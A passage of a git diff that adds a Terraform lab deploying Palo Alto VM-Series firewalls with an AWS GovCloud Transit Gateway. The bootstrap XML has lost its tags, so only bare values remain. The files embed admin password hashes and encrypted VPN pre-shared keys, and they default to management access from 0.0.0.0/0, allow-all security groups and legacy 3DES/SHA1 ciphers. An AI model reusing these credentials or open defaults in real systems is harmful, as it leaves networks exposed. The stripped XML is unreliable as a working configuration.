ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files/init-cfg.txt b/aws/TGW-VPC-GovCloud/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..6ad1fb1b --- /dev/null +++ b/aws/TGW-VPC-GovCloud/bootstrap_files/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-1 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files2/bootstrap.xml b/aws/TGW-VPC-GovCloud/bootstrap_files2/bootstrap.xml new file mode 100644 index 00000000..13369f72 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/bootstrap_files2/bootstrap.xml @@ -0,0 +1,871 @@ + + + + + + $1$frspqxow$mYHgnubHD/BO9DTqIU8eP. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$aljwjsru$ZIQ1DURHk0wBmwWTajdFu/ + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 
2 + + + 192.168.102.1 + + + None + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-2 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + FW-2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 2002 + + + + + + + + + + 1002 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + any + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files2/init-cfg.txt b/aws/TGW-VPC-GovCloud/bootstrap_files2/init-cfg.txt new file mode 100644 index 00000000..6dc97916 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/bootstrap_files2/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-2 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-GovCloud/providers.tf b/aws/TGW-VPC-GovCloud/providers.tf new file mode 100644 index 00000000..af7b0ba3 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/providers.tf @@ -0,0 +1,3 @@ +provider "aws" { + region = "${var.aws_region}" +} diff --git a/aws/TGW-VPC-GovCloud/tgw.tf b/aws/TGW-VPC-GovCloud/tgw.tf new file mode 100644 index 00000000..191dce08 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/tgw.tf @@ -0,0 +1,51 @@ +resource "aws_ec2_transit_gateway" "tgw" { + description = "Transit Gateway" + vpn_ecmp_support = "enable" + default_route_table_association = "disable" + default_route_table_propagation = "disable" + dns_support = "enable" + auto_accept_shared_attachments = "disable" + + tags { + Name = "transit_gateway" + } +} + 
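+# Two TGW route tables split the routing domains: tgw_security receives the routes
+# propagated from the spoke VPC attachments, while tgw_spokes carries only a default
+# route pointing at the security VPC attachment, so all spoke traffic (N/S and E/W)
+# is steered through the VM-Series firewalls before reaching its destination.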
+resource "aws_ec2_transit_gateway_route_table" "tgw_security" { + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + + tags { + Name = "tgw-rtb-security" + } +} + +resource "aws_ec2_transit_gateway_route_table" "tgw_spokes" { + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + + tags { + Name = "tgw-rtb-spokes" + } +} + +resource "aws_ec2_transit_gateway_route" "default" { + destination_cidr_block = "0.0.0.0/0" + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}" + transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" +} + +resource "aws_ec2_transit_gateway_route_table_association" "vpc_security" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}" + transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} + +resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_security" { + vpc_id = "${aws_vpc.vpc_security.id}" + subnet_ids = ["${aws_subnet.vpc_security_tgw_1.id}", "${aws_subnet.vpc_security_tgw_2.id}"] + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + transit_gateway_default_route_table_association = false + transit_gateway_default_route_table_propagation = false + + tags { + Name = "tgw_attachment_security" + } +} diff --git a/aws/TGW-VPC-GovCloud/variables.tf b/aws/TGW-VPC-GovCloud/variables.tf new file mode 100644 index 00000000..75faedb0 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/variables.tf @@ -0,0 +1,134 @@ +//This section should be verified and modified accordingly. +variable aws_region { + description = "AWS Region for deployment" + default = "us-gov-west-1" +} + +variable aws_key { + description = "aws_key" + default = "AWS-Lab-Pair" +} + +//Do not create these. The Terraform will do that. Just need to make secure +//the s3 bucket names are unique. 
+ +variable bootstrap_s3bucket { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "ptg-tgw-bucket1" +} + +variable bootstrap_s3bucket2 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "ptg-tgw-bucket2" +} + +//End of the section that MUST be modified to work +variable management_cidr { + description = "CIDR Address for Management Access" + default = "0.0.0.0/0" +} + +variable vpc_security_cidr { + description = "CIDR Address for Security VPC" + default = "192.168.0.0/16" +} + +variable vpc_security_subnet_public_1 { + description = "CIDR Address for Security VPC" + default = "192.168.1.0/24" +} + +variable vpc_security_subnet_private_1 { + description = "CIDR Address for Security VPC" + default = "192.168.101.0/24" +} + +variable fw_ip_subnet_private_1 { + description = "CIDR Address for Security VPC" + default = "192.168.101.45" +} + +variable fw_ip_subnet_public_1 { + description = "CIDR Address for Security VPC" + default = "192.168.1.45" +} + +variable vpc_security_subnet_tgw_1 { + description = "CIDR Address for TGW Security VPC" + default = "192.168.11.0/24" +} + +variable vpc_security_subnet_public_2 { + description = "CIDR Address for Security VPC" + default = "192.168.2.0/24" +} + +variable vpc_security_subnet_private_2 { + description = "CIDR Address for Security VPC" + default = "192.168.102.0/24" +} + +variable vpc_security_subnet_tgw_2 { + description = "CIDR Address for TGW Security VPC" + default = "192.168.21.0/24" +} + +variable fw_ip_subnet_private_2 { + description = "CIDR Address for Security VPC" + default = "192.168.102.45" +} + +variable fw_ip_subnet_public_2 { + description = "CIDR Address for Security VPC" + default = "192.168.2.45" +} + +variable spoke1_cidr { + description = "CIDR Address for Spoke1 VPC" + default = "10.1.0.0/16" +} + +variable spoke1_subnet { + description = "CIDR Address for Spoke1 Subnet" + default = "10.1.1.0/24" +} + +variable spoke1_subnet2 { + description = "CIDR Address for Spoke1 Subnet" + default = "10.1.2.0/24" +} + +variable spoke1_server { + description = "Server Address for Spoke1 Server" + default = "10.1.1.45" +} + +variable spoke1_server2 { + description = "Server Address for Spoke1 Server2" + default = "10.1.2.45" +} + +variable spoke2_cidr { + description = "CIDR Address for Spoke2 VPC" + default = "10.2.0.0/16" +} + +variable spoke2_subnet { + description = "CIDR Address for Spoke2 Subnet" + default = "10.2.1.0/24" +} + +variable spoke2_subnet2 { + description = "CIDR Address for Spoke2 Subnet" + default = "10.2.2.0/24" +} + +variable spoke2_server { + description = "Server Address for Spoke2 Server" + default = "10.2.1.45" +} + +variable spoke2_server2 { + description = "Server Address for Spoke2 Server2" + default = "10.2.2.45" +} diff --git a/aws/TGW-VPC-GovCloud/vm-series/main.tf b/aws/TGW-VPC-GovCloud/vm-series/main.tf new file mode 100644 index 00000000..e519e14c --- /dev/null +++ b/aws/TGW-VPC-GovCloud/vm-series/main.tf @@ -0,0 +1,165 @@ +variable name { + description = "firewall instance name" +} + +variable untrust_subnet_id {} +variable untrust_security_group_id {} +variable untrustfwip {} + +variable trust_subnet_id {} +variable trust_security_group_id {} +variable trustfwip {} + +variable management_subnet_id {} +variable management_security_group_id {} + +variable bootstrap_profile { + default = "" +} + +variable bootstrap_s3bucket {} + +variable tgw_id {} + +variable aws_region {} +variable aws_key {} + +variable instance_type { + default = "m4.2xlarge" +} + 
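+# ngfw_license_type selects the AWS Marketplace product code from license_type_map
+# below (byol, payg1 or payg2); together with ngfw_version it drives the aws_ami
+# data-source lookup for the PA-VM image.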
+variable ngfw_license_type { + default = "payg2" +} + +variable ngfw_version { + default = "8.1" +} + +variable "license_type_map" { + type = "map" + + default = { + "byol" = "6njl1pau431dv1qxipg63mvah" + "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km" + "payg2" = "806j2of0qy5osgjjixq9gqc6g" + } +} + +data "aws_ami" "panw_ngfw" { + most_recent = true + owners = ["aws-marketplace"] + filter { + name = "owner-alias" + values = ["aws-marketplace"] + } + + filter { + name = "product-code" + values = ["${var.license_type_map[var.ngfw_license_type]}"] + } + + filter { + name = "name" + values = ["PA-VM-AWS-${var.ngfw_version}*"] + } +} + +data "aws_region" "current" { + name = "${var.aws_region}" +} + +resource "aws_network_interface" "eni-management" { + subnet_id = "${var.management_subnet_id}" + security_groups = ["${var.management_security_group_id}"] + source_dest_check = true + + tags { + Name = "eni_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-trust" { + subnet_id = "${var.trust_subnet_id}" + private_ips = ["${var.trustfwip}"] + security_groups = ["${var.trust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_trust" + } +} + +output "eni-trust" { + value = "${aws_network_interface.eni-trust.id}" +} + +resource "aws_eip" "eip-management" { + vpc = true + network_interface = "${aws_network_interface.eni-management.id}" + + tags { + Name = "eip_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-untrust" { + subnet_id = "${var.untrust_subnet_id}" + private_ips = ["${var.untrustfwip}"] + security_groups = ["${var.untrust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_untrust" + } +} + +resource "aws_eip" "eip-untrust" { + vpc = true + network_interface = "${aws_network_interface.eni-untrust.id}" + + tags { + Name = "eip_${var.name}_untrust" + } +} + +resource "aws_instance" "instance-ngfw" { + disable_api_termination = false + instance_initiated_shutdown_behavior = "stop" + iam_instance_profile = "${var.bootstrap_profile}" + user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}" + + ebs_optimized = true + ami = "${data.aws_ami.panw_ngfw.image_id}" + instance_type = "${var.instance_type}" + key_name = "${var.aws_key}" + + monitoring = false + + network_interface { + device_index = 1 + network_interface_id = "${aws_network_interface.eni-management.id}" + } + + network_interface { + device_index = 0 + network_interface_id = "${aws_network_interface.eni-untrust.id}" + } + + network_interface { + device_index = 2 + network_interface_id = "${aws_network_interface.eni-trust.id}" + } + + tags { + Name = "${var.name}" + } +} + +output "eip_untrust" { + value = "${aws_eip.eip-untrust.public_ip}" +} + +output "eip_mgmt" { + value = "${aws_eip.eip-management.public_ip}" +} diff --git a/aws/TGW-VPC-GovCloud/vpc_security.tf b/aws/TGW-VPC-GovCloud/vpc_security.tf new file mode 100644 index 00000000..2d0fe6e8 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/vpc_security.tf @@ -0,0 +1,325 @@ +data "aws_availability_zones" "available" {} + +resource "aws_vpc" "vpc_security" { + cidr_block = "${var.vpc_security_cidr}" + + tags { + Name = "vpc_security" + } +} + +resource "aws_subnet" "vpc_security_public_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_public_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_public_1" + } +} + +resource "aws_subnet" 
"vpc_security_public_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_public_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_public_2" + } +} + +resource "aws_subnet" "vpc_security_private_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_private_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_private_1" + } +} + +resource "aws_subnet" "vpc_security_private_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_private_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_private_2" + } +} + +resource "aws_subnet" "vpc_security_tgw_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_tgw_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_tgw_1" + } +} + +resource "aws_subnet" "vpc_security_tgw_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_tgw_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_tgw_2" + } +} + +resource "aws_route_table" "vpc_security_tgw_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "tgw_1" + } +} + +resource "aws_route_table" "vpc_security_tgw_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "tgw_2" + } +} + +resource "aws_route_table" "vpc_security_private_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "private_1" + } +} + +resource "aws_route_table" "vpc_security_private_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "private_2" + } +} + +resource "aws_route_table_association" "vpc_security_private_1" { + subnet_id = "${aws_subnet.vpc_security_private_1.id}" + route_table_id = "${aws_route_table.vpc_security_private_1.id}" +} + +resource "aws_route_table_association" "vpc_security_private_2" { + subnet_id = "${aws_subnet.vpc_security_private_2.id}" + route_table_id = "${aws_route_table.vpc_security_private_2.id}" +} + +resource "aws_route_table_association" "vpc_security_tgw_1" { + subnet_id = "${aws_subnet.vpc_security_tgw_1.id}" + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" +} + +resource "aws_route_table_association" "vpc_security_tgw_2" { + subnet_id = "${aws_subnet.vpc_security_tgw_2.id}" + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" +} + +resource "aws_route" "vpc_security_tgw_1_0" { + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" + destination_cidr_block = "0.0.0.0/0" + network_interface_id = "${module.ngfw1.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_1_1" { + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" + destination_cidr_block = "10.0.0.0/8" + network_interface_id = "${module.ngfw1.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_2_0" { + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" + destination_cidr_block = "0.0.0.0/0" + network_interface_id = "${module.ngfw2.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_2_1" { + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" + destination_cidr_block = "10.0.0.0/8" + network_interface_id = "${module.ngfw2.eni-trust}" +} + +resource "aws_route" "vpc_security_trust_1_0" { + route_table_id = "${aws_route_table.vpc_security_private_1.id}" + 
destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" +} + +resource "aws_route" "vpc_security_trust_2_0" { + route_table_id = "${aws_route_table.vpc_security_private_2.id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" +} + +resource "aws_internet_gateway" "vpc_security_igw" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "vpc_securty_igw" + } +} + +resource "aws_route" "vpc_security_default" { + route_table_id = "${aws_vpc.vpc_security.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + gateway_id = "${aws_internet_gateway.vpc_security_igw.id}" +} + +resource "aws_security_group" "allow_all" { + name = "allow_all" + description = "Allow all inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_all_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group_rule" "allow_all_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group" "allow_https_ssh" { + name = "allow_https_ssh" + description = "Allow HTTPS and SSH inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_ssh_ingress" { + type = "ingress" + from_port = 22 + to_port = 22 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_https_ingress" { + type = "ingress" + from_port = 443 + to_port = 443 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_all" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +module "ngfw1" { + source = "./vm-series/" + + name = "ngfw1" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_security_private_1.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_private_1}" + + untrust_subnet_id = "${aws_subnet.vpc_security_public_1.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_public_1 }" + + management_subnet_id = "${aws_subnet.vpc_security_public_1.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} + +module "ngfw2" { + source = "./vm-series/" + + name = "ngfw2" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_security_private_2.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_private_2}" + + untrust_subnet_id = "${aws_subnet.vpc_security_public_2.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_public_2 }" + + management_subnet_id = "${aws_subnet.vpc_security_public_2.id}" + management_security_group_id = 
"${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile2.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket2}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} + +output "FW-1-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw1.eip_mgmt}" +} + +output "Server-1-1_ngfw1_access" { + value = "Access Server 1-1 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 1001" +} + +output "Server-1-2_ngfw1_access" { + value = "Access Server 1-2 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 1002" +} + +output "Server-2-1_ngfw1_access" { + value = "Access Server 2-1 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 2001" +} + +output "Server-2-2_ngfw1_access" { + value = "Access Server 2-2 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 2002" +} + +output "FW-2-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw2.eip_mgmt}" +} + +output "Server-1-1_ngfw2_access" { + value = "Access Server 1-1 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 1001" +} + +output "Server-1-2_ngfw2_access" { + value = "Access Server 1-2 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 1002" +} + +output "Server-2-1_ngfw2_access" { + value = "Access Server 2-1 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 2001" +} + +output "Server-2-2_ngfw2_access" { + value = "Access Server 2-2 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 2002" +} diff --git a/aws/TGW-VPC-GovCloud/vpc_spoke/main.tf b/aws/TGW-VPC-GovCloud/vpc_spoke/main.tf new file mode 100644 index 00000000..0e6da0e8 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/vpc_spoke/main.tf @@ -0,0 +1,191 @@ +variable vpc_spoke_cidr { + description = "CIDR Network Address for Spoke VPC" +} + +variable vpc_spoke_subnet_cidr { + description = "CIDR Network Address for Spoke Subnet" +} + +variable vpc_spoke_subnet2_cidr { + description = "CIDR Network Address for Spoke Subnet" +} + +variable aws_tgw_id { + description = "AWS Transit Gateway ID" +} + +variable aws_tgw_security_rtb_id { + description = "AWS Transit Gateway Route Table Id" +} + +variable aws_tgw_spoke_rtb_id { + description = "AWS Transit Gateway Route Table Id" +} + +variable pemkey { + description = "AWS pem KEY" +} + +variable serverip { + description = "Ubuntu Server IP" +} + +variable server2ip { + description = "Ubuntu Server2 IP" +} + +variable servername { + description = "Ubuntu Server name" +} + +variable server2name { + description = "Ubuntu Server2 name" +} + +resource "aws_vpc" "vpc_spoke" { + cidr_block = "${var.vpc_spoke_cidr}" + + tags { + Name = "vpc_spoke_${var.vpc_spoke_cidr}" + } +} + +data "aws_availability_zones" "available" {} + +resource "aws_subnet" "primary" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + cidr_block = "${var.vpc_spoke_subnet_cidr}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_spokeA_${var.vpc_spoke_subnet_cidr}" + } +} + +resource "aws_subnet" "secondary" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + cidr_block = "${var.vpc_spoke_subnet2_cidr}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_spokeB_${var.vpc_spoke_subnet2_cidr}" + } +} + +resource "aws_security_group" "server_sg" { + name = "server_sg" + description = "Allow select inbound traffic" + vpc_id = "${aws_vpc.vpc_spoke.id}" +} + +resource "aws_security_group_rule" "allow_server_sg_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 + 
protocol = "-1" + cidr_blocks = ["10.0.0.0/8", "192.168.0.0/16"] + + security_group_id = "${aws_security_group.server_sg.id}" +} + +resource "aws_security_group_rule" "allow_server_sg_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.server_sg.id}" +} + +resource "aws_route" "vpc_spoke_route_1" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_route" "vpc_spoke_route_2" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "192.168.0.0/16" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_route" "vpc_spoke_route_3" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_spoke_attachment" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + subnet_ids = ["${aws_subnet.primary.id}", "${aws_subnet.secondary.id}"] + transit_gateway_id = "${var.aws_tgw_id}" + transit_gateway_default_route_table_association = false + transit_gateway_default_route_table_propagation = false + + tags { + Name = "tgw_attachment_spoke_${var.vpc_spoke_cidr}" + } +} + +resource "aws_ec2_transit_gateway_route_table_association" "vpc_spoke_1" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}" + transit_gateway_route_table_id = "${var.aws_tgw_spoke_rtb_id}" +} + +resource "aws_ec2_transit_gateway_route_table_propagation" "route_table_propagation" { + 